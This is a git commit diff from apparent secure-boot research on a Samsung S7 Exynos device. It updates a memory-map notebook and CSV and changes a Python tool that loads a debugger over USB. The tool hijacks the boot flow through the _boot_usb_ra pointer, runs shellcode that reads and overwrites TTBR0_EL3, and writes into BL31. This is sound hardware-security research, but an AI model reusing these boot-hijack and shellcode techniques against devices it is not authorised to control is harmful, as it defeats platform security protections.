TTBR0_EL3 visible after BL31

Jonathan Herrewijnen 2024-08-28 18:45:05 +02:00
parent 91c7d60638
commit a12453cbd3
4 changed files with 254 additions and 164 deletions


@ -2,7 +2,7 @@
"cells": [
{
"cell_type": "code",
"execution_count": 416,
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
@ -20,7 +20,7 @@
},
{
"cell_type": "code",
"execution_count": 417,
"execution_count": 2,
"metadata": {},
"outputs": [
{
@ -49,6 +49,8 @@
" <th>name</th>\n",
" <th>order</th>\n",
" <th>comment</th>\n",
" <th>X0</th>\n",
" <th>LR</th>\n",
" <th>size</th>\n",
" <th>overlap</th>\n",
" <th>overlap_with</th>\n",
@ -62,6 +64,8 @@
" <td>BootROM</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>131072</td>\n",
" <td>True</td>\n",
" <td>0.0</td>\n",
@ -73,6 +77,8 @@
" <td>_jump_bl1</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>True</td>\n",
" <td>0.0</td>\n",
@ -84,6 +90,8 @@
" <td>_boot_usb</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>172</td>\n",
" <td>True</td>\n",
" <td>0.0</td>\n",
@ -95,6 +103,8 @@
" <td>auth_bl1</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>160</td>\n",
" <td>True</td>\n",
" <td>0.0</td>\n",
@ -106,6 +116,8 @@
" <td>Tried debugger space</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>28672</td>\n",
" <td>False</td>\n",
" <td>4.0</td>\n",
@ -117,6 +129,8 @@
" <td>_boot_usb_ra</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>8</td>\n",
" <td>False</td>\n",
" <td>5.0</td>\n",
@ -128,6 +142,8 @@
" <td>BL1</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>8192</td>\n",
" <td>False</td>\n",
" <td>6.0</td>\n",
@ -139,6 +155,8 @@
" <td>BL31</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>147456</td>\n",
" <td>False</td>\n",
" <td>7.0</td>\n",
@ -150,6 +168,8 @@
" <td>BL2</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>158992</td>\n",
" <td>True</td>\n",
" <td>8.0</td>\n",
@ -161,6 +181,8 @@
" <td>Debugger</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>24576</td>\n",
" <td>True</td>\n",
" <td>8.0</td>\n",
@ -172,6 +194,8 @@
" <td>End/Start peripheral space?</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>4848</td>\n",
" <td>True</td>\n",
" <td>9.0</td>\n",
@ -183,6 +207,8 @@
" <td>Debugger relocated</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>28672</td>\n",
" <td>True</td>\n",
" <td>11.0</td>\n",
@ -194,6 +220,8 @@
" <td>_frederic_dest_ptr</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>True</td>\n",
" <td>11.0</td>\n",
@ -205,6 +233,8 @@
" <td>modem_interface</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>2048</td>\n",
" <td>False</td>\n",
" <td>13.0</td>\n",
@ -216,6 +246,8 @@
" <td>mali@14AC0000</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>20480</td>\n",
" <td>False</td>\n",
" <td>14.0</td>\n",
@ -225,42 +257,42 @@
"</div>"
],
"text/plain": [
" start end name order comment size \\\n",
"0 0 131072 BootROM NaN NaN 131072 \n",
"1 704 708 _jump_bl1 NaN NaN 4 \n",
"2 25824 25996 _boot_usb NaN NaN 172 \n",
"3 75848 76008 auth_bl1 NaN NaN 160 \n",
"4 33660508 33689180 Tried debugger space NaN NaN 28672 \n",
"5 33689440 33689448 _boot_usb_ra NaN NaN 8 \n",
"6 33693696 33701888 BL1 NaN NaN 8192 \n",
"7 33701888 33849344 BL31 NaN NaN 147456 \n",
"8 33849344 34008336 BL2 NaN NaN 158992 \n",
"9 33984512 34009088 Debugger NaN NaN 24576 \n",
"10 34008336 34013184 End/Start peripheral space? NaN NaN 4848 \n",
"11 34340864 34369536 Debugger relocated NaN NaN 28672 \n",
"12 34340864 34340868 _frederic_dest_ptr NaN NaN 4 \n",
"13 34371584 34373632 modem_interface NaN NaN 2048 \n",
"14 346816512 346836992 mali@14AC0000 NaN NaN 20480 \n",
" start end name order comment X0 LR \\\n",
"0 0 131072 BootROM NaN NaN NaN NaN \n",
"1 704 708 _jump_bl1 NaN NaN NaN NaN \n",
"2 25824 25996 _boot_usb NaN NaN NaN NaN \n",
"3 75848 76008 auth_bl1 NaN NaN NaN NaN \n",
"4 33660508 33689180 Tried debugger space NaN NaN NaN NaN \n",
"5 33689440 33689448 _boot_usb_ra NaN NaN NaN NaN \n",
"6 33693696 33701888 BL1 NaN NaN NaN NaN \n",
"7 33701888 33849344 BL31 NaN NaN NaN NaN \n",
"8 33849344 34008336 BL2 NaN NaN NaN NaN \n",
"9 33984512 34009088 Debugger NaN NaN NaN NaN \n",
"10 34008336 34013184 End/Start peripheral space? NaN NaN NaN NaN \n",
"11 34340864 34369536 Debugger relocated NaN NaN NaN NaN \n",
"12 34340864 34340868 _frederic_dest_ptr NaN NaN NaN NaN \n",
"13 34371584 34373632 modem_interface NaN NaN NaN NaN \n",
"14 346816512 346836992 mali@14AC0000 NaN NaN NaN NaN \n",
"\n",
" overlap overlap_with \n",
"0 True 0.0 \n",
"1 True 0.0 \n",
"2 True 0.0 \n",
"3 True 0.0 \n",
"4 False 4.0 \n",
"5 False 5.0 \n",
"6 False 6.0 \n",
"7 False 7.0 \n",
"8 True 8.0 \n",
"9 True 8.0 \n",
"10 True 9.0 \n",
"11 True 11.0 \n",
"12 True 11.0 \n",
"13 False 13.0 \n",
"14 False 14.0 "
" size overlap overlap_with \n",
"0 131072 True 0.0 \n",
"1 4 True 0.0 \n",
"2 172 True 0.0 \n",
"3 160 True 0.0 \n",
"4 28672 False 4.0 \n",
"5 8 False 5.0 \n",
"6 8192 False 6.0 \n",
"7 147456 False 7.0 \n",
"8 158992 True 8.0 \n",
"9 24576 True 8.0 \n",
"10 4848 True 9.0 \n",
"11 28672 True 11.0 \n",
"12 4 True 11.0 \n",
"13 2048 False 13.0 \n",
"14 20480 False 14.0 "
]
},
"execution_count": 417,
"execution_count": 2,
"metadata": {},
"output_type": "execute_result"
}
@ -320,7 +352,7 @@
},
{
"cell_type": "code",
"execution_count": 418,
"execution_count": 3,
"metadata": {},
"outputs": [
{
@ -332,7 +364,7 @@
"data": [
{
"marker": {
"color": "#c574e6"
"color": "#46d3f4"
},
"mode": "text",
"name": "BootROM",
@ -348,7 +380,7 @@
},
{
"marker": {
"color": "#c574e6"
"color": "#46d3f4"
},
"mode": "text",
"showlegend": false,
@ -364,7 +396,7 @@
},
{
"marker": {
"color": "#c574e6"
"color": "#46d3f4"
},
"mode": "text",
"showlegend": false,
@ -380,7 +412,7 @@
},
{
"marker": {
"color": "#094b47"
"color": "#05f11d"
},
"mode": "text",
"name": "_jump_bl1",
@ -396,7 +428,7 @@
},
{
"marker": {
"color": "#094b47"
"color": "#05f11d"
},
"mode": "text",
"showlegend": false,
@ -412,7 +444,7 @@
},
{
"marker": {
"color": "#094b47"
"color": "#05f11d"
},
"mode": "text",
"showlegend": false,
@ -428,7 +460,7 @@
},
{
"marker": {
"color": "#f3ff4d"
"color": "#15ef8e"
},
"mode": "text",
"name": "_boot_usb",
@ -444,7 +476,7 @@
},
{
"marker": {
"color": "#f3ff4d"
"color": "#15ef8e"
},
"mode": "text",
"showlegend": false,
@ -460,7 +492,7 @@
},
{
"marker": {
"color": "#f3ff4d"
"color": "#15ef8e"
},
"mode": "text",
"showlegend": false,
@ -476,7 +508,7 @@
},
{
"marker": {
"color": "#7e3e97"
"color": "#d1cb9b"
},
"mode": "text",
"name": "auth_bl1",
@ -492,7 +524,7 @@
},
{
"marker": {
"color": "#7e3e97"
"color": "#d1cb9b"
},
"mode": "text",
"showlegend": false,
@ -508,7 +540,7 @@
},
{
"marker": {
"color": "#7e3e97"
"color": "#d1cb9b"
},
"mode": "text",
"showlegend": false,
@ -524,7 +556,7 @@
},
{
"marker": {
"color": "#e36dac"
"color": "#bafebb"
},
"mode": "text",
"name": "Tried debugger space",
@ -540,7 +572,7 @@
},
{
"marker": {
"color": "#e36dac"
"color": "#bafebb"
},
"mode": "text",
"showlegend": false,
@ -556,7 +588,7 @@
},
{
"marker": {
"color": "#e36dac"
"color": "#bafebb"
},
"mode": "text",
"showlegend": false,
@ -572,7 +604,7 @@
},
{
"marker": {
"color": "#9d6e7f"
"color": "#b21068"
},
"mode": "text",
"name": "_boot_usb_ra",
@ -588,7 +620,7 @@
},
{
"marker": {
"color": "#9d6e7f"
"color": "#b21068"
},
"mode": "text",
"showlegend": false,
@ -604,7 +636,7 @@
},
{
"marker": {
"color": "#9d6e7f"
"color": "#b21068"
},
"mode": "text",
"showlegend": false,
@ -620,7 +652,7 @@
},
{
"marker": {
"color": "#48e551"
"color": "#d43e00"
},
"mode": "text",
"name": "BL1",
@ -636,7 +668,7 @@
},
{
"marker": {
"color": "#48e551"
"color": "#d43e00"
},
"mode": "text",
"showlegend": false,
@ -652,7 +684,7 @@
},
{
"marker": {
"color": "#48e551"
"color": "#d43e00"
},
"mode": "text",
"showlegend": false,
@ -668,7 +700,7 @@
},
{
"marker": {
"color": "#082a5a"
"color": "#2fcf29"
},
"mode": "text",
"name": "BL31",
@ -684,7 +716,7 @@
},
{
"marker": {
"color": "#082a5a"
"color": "#2fcf29"
},
"mode": "text",
"showlegend": false,
@ -700,7 +732,7 @@
},
{
"marker": {
"color": "#082a5a"
"color": "#2fcf29"
},
"mode": "text",
"showlegend": false,
@ -716,7 +748,7 @@
},
{
"marker": {
"color": "#12adbc"
"color": "#7ac7dc"
},
"mode": "text",
"name": "BL2",
@ -732,7 +764,7 @@
},
{
"marker": {
"color": "#12adbc"
"color": "#7ac7dc"
},
"mode": "text",
"showlegend": false,
@ -748,7 +780,7 @@
},
{
"marker": {
"color": "#12adbc"
"color": "#7ac7dc"
},
"mode": "text",
"showlegend": false,
@ -764,7 +796,7 @@
},
{
"marker": {
"color": "#afec87"
"color": "#1a256d"
},
"mode": "text",
"name": "Debugger",
@ -780,7 +812,7 @@
},
{
"marker": {
"color": "#afec87"
"color": "#1a256d"
},
"mode": "text",
"showlegend": false,
@ -796,7 +828,7 @@
},
{
"marker": {
"color": "#afec87"
"color": "#1a256d"
},
"mode": "text",
"showlegend": false,
@ -812,7 +844,7 @@
},
{
"marker": {
"color": "#680696"
"color": "#b0eb7f"
},
"mode": "text",
"name": "End/Start peripheral space?",
@ -828,7 +860,7 @@
},
{
"marker": {
"color": "#680696"
"color": "#b0eb7f"
},
"mode": "text",
"showlegend": false,
@ -844,7 +876,7 @@
},
{
"marker": {
"color": "#680696"
"color": "#b0eb7f"
},
"mode": "text",
"showlegend": false,
@ -860,7 +892,7 @@
},
{
"marker": {
"color": "#feeb63"
"color": "#e42eab"
},
"mode": "text",
"name": "Debugger relocated",
@ -876,7 +908,7 @@
},
{
"marker": {
"color": "#feeb63"
"color": "#e42eab"
},
"mode": "text",
"showlegend": false,
@ -892,7 +924,7 @@
},
{
"marker": {
"color": "#feeb63"
"color": "#e42eab"
},
"mode": "text",
"showlegend": false,
@ -908,7 +940,7 @@
},
{
"marker": {
"color": "#51c421"
"color": "#b86b0c"
},
"mode": "text",
"name": "_frederic_dest_ptr",
@ -924,7 +956,7 @@
},
{
"marker": {
"color": "#51c421"
"color": "#b86b0c"
},
"mode": "text",
"showlegend": false,
@ -940,7 +972,7 @@
},
{
"marker": {
"color": "#51c421"
"color": "#b86b0c"
},
"mode": "text",
"showlegend": false,
@ -956,7 +988,7 @@
},
{
"marker": {
"color": "#a8b579"
"color": "#625596"
},
"mode": "text",
"name": "modem_interface",
@ -972,7 +1004,7 @@
},
{
"marker": {
"color": "#a8b579"
"color": "#625596"
},
"mode": "text",
"showlegend": false,
@ -988,7 +1020,7 @@
},
{
"marker": {
"color": "#a8b579"
"color": "#625596"
},
"mode": "text",
"showlegend": false,
@ -1004,7 +1036,7 @@
},
{
"marker": {
"color": "#521205"
"color": "#5b6129"
},
"mode": "text",
"name": "mali@14AC0000",
@ -1020,7 +1052,7 @@
},
{
"marker": {
"color": "#521205"
"color": "#5b6129"
},
"mode": "text",
"showlegend": false,
@ -1036,7 +1068,7 @@
},
{
"marker": {
"color": "#521205"
"color": "#5b6129"
},
"mode": "text",
"showlegend": false,
@ -1070,7 +1102,7 @@
},
"shapes": [
{
"fillcolor": "#c574e6",
"fillcolor": "#46d3f4",
"layer": "below",
"line": {
"width": 2
@ -1083,7 +1115,7 @@
"y1": 3.92
},
{
"fillcolor": "#094b47",
"fillcolor": "#05f11d",
"layer": "below",
"line": {
"width": 2
@ -1096,7 +1128,7 @@
"y1": 1.79
},
{
"fillcolor": "#f3ff4d",
"fillcolor": "#15ef8e",
"layer": "below",
"line": {
"width": 2
@ -1109,7 +1141,7 @@
"y1": 2.79
},
{
"fillcolor": "#7e3e97",
"fillcolor": "#d1cb9b",
"layer": "below",
"line": {
"width": 2
@ -1122,7 +1154,7 @@
"y1": 3.79
},
{
"fillcolor": "#e36dac",
"fillcolor": "#bafebb",
"layer": "below",
"line": {
"width": 2
@ -1135,7 +1167,7 @@
"y1": 4.92
},
{
"fillcolor": "#9d6e7f",
"fillcolor": "#b21068",
"layer": "below",
"line": {
"width": 2
@ -1148,7 +1180,7 @@
"y1": 5.92
},
{
"fillcolor": "#48e551",
"fillcolor": "#d43e00",
"layer": "below",
"line": {
"width": 2
@ -1161,7 +1193,7 @@
"y1": 6.92
},
{
"fillcolor": "#082a5a",
"fillcolor": "#2fcf29",
"layer": "below",
"line": {
"width": 2
@ -1174,7 +1206,7 @@
"y1": 7.92
},
{
"fillcolor": "#12adbc",
"fillcolor": "#7ac7dc",
"layer": "below",
"line": {
"width": 2
@ -1187,7 +1219,7 @@
"y1": 9.42
},
{
"fillcolor": "#afec87",
"fillcolor": "#1a256d",
"layer": "below",
"line": {
"width": 2
@ -1200,7 +1232,7 @@
"y1": 9.79
},
{
"fillcolor": "#680696",
"fillcolor": "#b0eb7f",
"layer": "below",
"line": {
"width": 2
@ -1213,7 +1245,7 @@
"y1": 10.79
},
{
"fillcolor": "#feeb63",
"fillcolor": "#e42eab",
"layer": "below",
"line": {
"width": 2
@ -1226,7 +1258,7 @@
"y1": 12.92
},
{
"fillcolor": "#51c421",
"fillcolor": "#b86b0c",
"layer": "below",
"line": {
"width": 2
@ -1239,7 +1271,7 @@
"y1": 12.79
},
{
"fillcolor": "#a8b579",
"fillcolor": "#625596",
"layer": "below",
"line": {
"width": 2
@ -1252,7 +1284,7 @@
"y1": 13.92
},
{
"fillcolor": "#521205",
"fillcolor": "#5b6129",
"layer": "below",
"line": {
"width": 2
@ -2281,6 +2313,16 @@
"\n",
"fig.show()"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [],
"source": [
"# Save to html\n",
"fig.write_html(\"stack_and_functions.html\")"
]
}
],
"metadata": {
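Review bot: Almost the whole of this notebook diff is regenerated output rather than a source change — the execution_count renumbering and a new hex value in every trace `"marker": {"color": ...}` and every shape `"fillcolor"` from the `@ -332` hunk onward — while the only edited source is the new final cell `fig.write_html("stack_and_functions.html")`. The colors appear to be drawn afresh on each run, so every re-execution will churn hundreds of output lines and hide real edits to the plotting code. Clearing outputs before committing (for example with an nbstripout pre-commit filter) or seeding the color generator in the plotting cell would keep the committed notebook reproducible. The added cell has an empty `outputs` list, so the HTML export has not been exercised in the committed state; a short comment such as `# Export the interactive plot next to the notebook; run after fig.show()` would state the intended workflow.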


@ -1,16 +1,16 @@
start,end,name,order,comment
0x00000000,0x00020000,BootROM,,
0x02020f60,0x02020f68,_boot_usb_ra,,
0x00012848,0x000128e8,auth_bl1,,
0x000064e0,0x0000658c,_boot_usb,,
0x020c0000,0x020c0004,_frederic_dest_ptr,,
0x000002c0,0x000002c4,_jump_bl1,,
0x02022000,0x02024000,BL1,,
0x02024000,0x02048000,BL31,,
0x02048000,0x0206ed10,BL2,,
0x02069000,0x0206f000,Debugger,,
0x020c0000,0x020c7000,Debugger relocated,,
0x0206ed10,0x02070000,End/Start peripheral space?,,
0x02019e5c,0x02020e5c,Tried debugger space,,
0x020C7800,0x020C8000,modem_interface,,
0x14AC0000,0x14ac5000,mali@14AC0000
start,end,name,order,comment,X0,LR
0x00000000,0x00020000,BootROM,,,,
0x02020f60,0x02020f68,_boot_usb_ra,,,,
0x00012848,0x000128e8,auth_bl1,,,,
0x000064e0,0x0000658c,_boot_usb,,,,
0x020c0000,0x020c0004,_frederic_dest_ptr,,,,
0x000002c0,0x000002c4,_jump_bl1,,,,
0x02022000,0x02024000,BL1,,,,
0x02024000,0x02048000,BL31,,,,
0x02048000,0x0206ed10,BL2,,,,
0x02069000,0x0206f000,Debugger,,,,
0x020c0000,0x020c7000,Debugger relocated,,,,
0x0206ed10,0x02070000,End/Start peripheral space?,,,,
0x02019e5c,0x02020e5c,Tried debugger space,,,,
0x020C7800,0x020C8000,modem_interface,,,,
0x14AC0000,0x14ac5000,mali@14AC0000,,,,

@ -321,6 +321,26 @@ class ExynosDevice():
except:
print("Error reading memory, at block: ", hex(block))
return dumped
def check_mem_write_execute(self, region):
"""
NOT WORKING YET
Write opcode to memory which jumps back immediatelly to the LR register at that moment.
"""
# LR to jump back to:
lr = self.cd.arch_dbg.state.LR
# Write opcode
shellcode = f"""
ldr x0, target_addr
blr x0
target_addr: .quad {hex(lr)}
"""
shellcode = ks.asm(shellcode, as_bytes=True)[0]
self.cd.memwrite_region(region, shellcode)
self.cd.jump_to(region)
def setup_guppy_debugger(self):
@ -339,14 +359,16 @@ class ExynosDevice():
def _initial_run_debugger():
"""Write debugger to device and test basic functionality"""
### Setup debugger
if os.getenv("USER") == "eljakim":
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
else:
try:
debugger = open("../../dump/debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
debugger += ((0x2000 - len(debugger)) * b"\x00")
assert len(debugger) == 0x2000, "Invalid debugger size, stage1 requires 0x2000 size"
for block in range(0, len(debugger), 0x200):
@ -363,39 +385,34 @@ class ExynosDevice():
_setup_debugger()
def relocate_debugger(self):
# Seems to be cleared upon cache clearing??
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
def relocate_debugger(self, debugger=None, entry=0x020c0000, storage=0x020c4000, g_data_received=0x020c6000):
"""
Relocates the debugger to another location. Make sure to have built the debugger with the correct addresses!
self.cd.memwrite_region(0x020c0000, debugger_reloc)
Args:
- debugger: The debugger to relocate. If None, it will use the default debugger.
- entry: The entry point of the debugger.
- storage: The storage location of the debugger.
- g_data_received: The location of the data received.
"""
if debugger is None:
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
else:
debugger_reloc = debugger
self.cd.memwrite_region(entry, debugger_reloc)
# self.usb_write(b"FLSH") # Flush cache
self.cd.restore_stack_and_jump(0x020c0000)
self.cd.restore_stack_and_jump(entry)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
self.cd.relocate_debugger(g_data_received+0x1000, entry, storage) #0x20c7000, 0x20c0000, 0x20c4000
def relocate_debugger_2(self):
# Seems to be cleared upon cache clearing??
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
self.cd.memwrite_region(0x020c0000, debugger_reloc)
# self.usb_write(b"FLSH") # Flush cache
self.cd.restore_stack_and_jump(0x020c0000)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
def dumb_interact(self, dump_imems=False):
'''
@ -560,13 +577,33 @@ class ExynosDevice():
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
# self.cd.restore_stack_and_jump(0x00012814)
# self.cd.restore_stack_and_jump(0x000125b4)
def get_ttbr0_el3(self):
shellcode= f"""
mov x1, lr
mrs x0, ttbr0_el3
ldr x2, =0x020c1000
str x0, [x2]
mov lr, x1
ret
"""
shellcode = ks.asm(shellcode, as_bytes=True)[0]
self.cd.memwrite_region(0x020c0000, shellcode)
self.cd.jump_to(0x020c0000)
ttbr0 = u64(self.cd.memdump_region(0x020c1000, 8))
print(f"TTBR0_EL3: {hex(ttbr0)}")
print(f"Bits: {ttbr0:064b}")
# Overwrite it with 0's
self.cd.memwrite_region(0x020c1000, b"\x00" * 8)
ttbr0 = self.cd.memdump_region(0x020c1000, 8)
assert ttbr0 == b"\x00" * 8, "TTBR0_EL3 not overwritten"
def debugger_boot(self):
"""
Boot into USB recovery mode using the debugger.
"""
### Setup debugger
self.setup_guppy_debugger()
self.cd.arch_dbg.state.auto_sync = False
@ -576,10 +613,17 @@ class ExynosDevice():
# dumped = self.dump_memory(0x20000, 0x2070000)
DEBUGGER_ADDR = 0x2069000
DEBUGGER_ADDR = 0x2069000 # 0x2069000
self.get_ttbr0_el3()
# Relocate to other debugger
debugger = open("../../dump/reloc_debugger_0x2019e5c.bin", "rb").read()
self.relocate_debugger(debugger=debugger, entry=0x02048000, storage=0x02051000, g_data_received=0x02052000)
DEBUGGER_ADDR = 0x02048000
### Overwrite boot_usb_ra to our debugger
self.cd.test_connection()
hijacked_usb_ra = self.cd.memdump_region(0x02020f60, 8)
self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))
@ -623,6 +667,9 @@ class ExynosDevice():
# ==== BL31 ====
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
self.get_ttbr0_el3()
# self.check_mem_write_execute(0x020c0000)
# Download next stage via ROM_DOWNLOAD_USB
lr = self.cd.arch_dbg.state.LR
@ -635,38 +682,39 @@ class ExynosDevice():
self.usb_read(0x200) # GiAs
# lr = self.cd.arch_dbg.state.LR
self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # Resore oginal boot flow
# TODO patch verification
# self.cd.memwrite_region(0x0202010c - 52, p32(GADGET_RET0))
# self.cd.memwrite_region(0x02024774, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
# self.cd.arch_dbg.state.X0 = 0x020347f0
# self.cd.arch_dbg.state.X1 = 0
# self.cd.restore_stack_and_jump(0x02030464)
# self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # Resore oginal boot flow
self.get_ttbr0_el3()
self.cd.restore_stack_and_jump(lr)
time.sleep(2)
self.usb_read(0x200) # GiAs
self.cd.memwrite_region(0x02031008, b"ELH")
# ====== PATCHES TO BL31 here! ======
# trampoline = self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br") # Keep LR
# self.cd.memwrite_region(0x02024020, trampoline)
# ====== PATCHES TO BL31 here! ======
# Relocate to other debugger
# debugger = open("../../dump/reloc_debugger_0x2019e5c.bin", "rb").read()
# self.relocate_debugger(debugger=debugger, entry=0x14AC0000, storage=0x14AC3000, g_data_received=0x14AC4000)
# DEBUGGER_ADDR = 0x14AC0000
# Jump BL31
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
self.cd.memwrite_region(0x20219b8, p32(DEBUGGER_ADDR))
# self.cd.restore_stack_and_jump(hijacked_fun)
self.cd.restore_stack_and_jump(0x02024010)
time.sleep(2)
self.connect_device()
# self.usb_read(0x200) # GiAs
# self.cd.restore_stack_and_jump(hijacked_fun)
self.usb_read(0x200) # GiAs
self.cd.arch_dbg.fetch_special_regs()
# ==== Stage 3 BL2 ====
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())